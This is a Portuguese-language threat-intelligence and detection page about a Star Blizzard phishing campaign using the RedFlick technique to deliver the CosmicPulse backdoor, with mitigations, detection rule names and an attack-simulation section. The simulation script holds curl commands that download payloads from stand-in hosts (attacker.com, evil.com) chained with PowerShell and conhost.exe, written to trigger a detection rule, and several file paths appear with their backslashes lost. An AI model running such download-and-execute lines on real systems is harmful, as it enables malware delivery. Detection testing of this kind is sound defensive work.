Star Blizzard Usa RedFlick para Melhorar a Implementação de Phishing e Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O ator russo patrocinado pelo Estado, Star Blizzard, evoluiu seu ofício utilizando a técnica RedFlick para entregar o backdoor CosmicPulse. O ator passou de spear-phishing altamente direcionado para campanhas de phishing automatizado em larga escala usando websites comprometidos. Essas campanhas utilizam métodos sofisticados de entrega, incluindo arquivos VHDX e cargas ocultas dentro de arquivos PDF para evadir a detecção.
Investigação
A Microsoft Threat Intelligence analisou várias ondas de phishing observadas ao longo de 2026, identificando uma transição de cadeias baseadas em ClickFix para tarefas agendadas RedFlick. A investigação detalhou um fluxo de execução em várias etapas envolvendo arquivos LNK, execução de comando local SSH e o uso de WebDAV para recuperação remota de carga. A análise técnica também revelou o uso de esteganografia e criptografia baseada em registro para a carga CosmicPulse.
Mitigação
As organizações devem implementar autenticação resistente a phishing e políticas de acesso condicional para proteger identidades. A proteção de endpoint deve ser configurada com EDR no modo de bloqueio e proteção antivírus em tempo real habilitada. Além disso, implementar regras de redução de superfície de ataque pode prevenir a execução de scripts ofuscados e arquivos executáveis não autorizados.
Resposta
Ao detectar, as equipes de segurança devem utilizar EDR para remediar artefatos maliciosos e investigar tentativas de login suspeitas. Modos de investigação e remediação automatizados devem ser habilitados para reduzir os tempos de resposta. As organizações também devem usar soluções avançadas anti-phishing e purga automática de zero horas para neutralizar comunicações maliciosas recebidas.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Linha de Comando Suspeita Contém Caminho UNC com Executável como Argumento (via cmdline)
Possível Descoberta de Compartilhamentos de Rede (via cmdline)
Tentativas Ocultas Suspeitas de Instalação Remota do Instalador MsiExec (via cmdline)
Conhost LOLBAS (via cmdline)
Possível Uso de Ferramenta de Tunelamento [Windows] (via cmdline)
Uso Suspeito de CURL (via cmdline)
Comando e Controle Suspeito por Solicitação de DNS de Domínio de Topo (TLD) Incomum (via dns)
IOCs (HashSha256) para detectar: Star Blizzard aprimora phishing e entrega de malware com a técnica RedFlick
IOCs (SourceIP) para detectar: Star Blizzard aprimora phishing e entrega de malware com a técnica RedFlick
IOCs (DestinationIP) para detectar: Star Blizzard aprimora phishing e entrega de malware com a técnica RedFlick
Detectar Execução de PowerShell de Download PDF [Windows Powershell]
Detecção da Técnica RedFlick do Star Blizzard – Tarefas Agendadas e Execução por Linha de Comando [Criação de Processo Windows]
Execução de Simulação
-
Narrativa & Comandos do Ataque: O adversário entrega um e-mail de phishing contendo um link para um arquivo malicioso. Ao interagir, uma sequência é acionada onde
curlé utilizado para buscar uma segunda etapa. Para se misturar com os processos do sistema, o comando é elaborado para incluir explicitamente os termosPowerShell,PDF(referenciando a fonte do gatilho), econhost.exena string da linha de comando para corresponder à lógica da regra de detecção alvo. O objetivo é executar uma carga decodificada embutida dentro de uma estrutura PDF. -
Script de Teste de Regressão:
# Script de simulação para acionar a regra 'Detectar Execução de PowerShell de Download PDF'. # Este script constrói uma string de linha de comando que inclui todas as quatro palavras-chave necessárias. $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF" $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Extracting from PDF...'; Start-Process conhost.exe}" # Nós executamos via cmd para garantir que conhost.exe seja parte da árvore de processos/contexto de comando Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extracting from PDF... using conhost.exe`"" -
Comandos de Limpeza:
# Limpar arquivos gerados durante a simulação Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue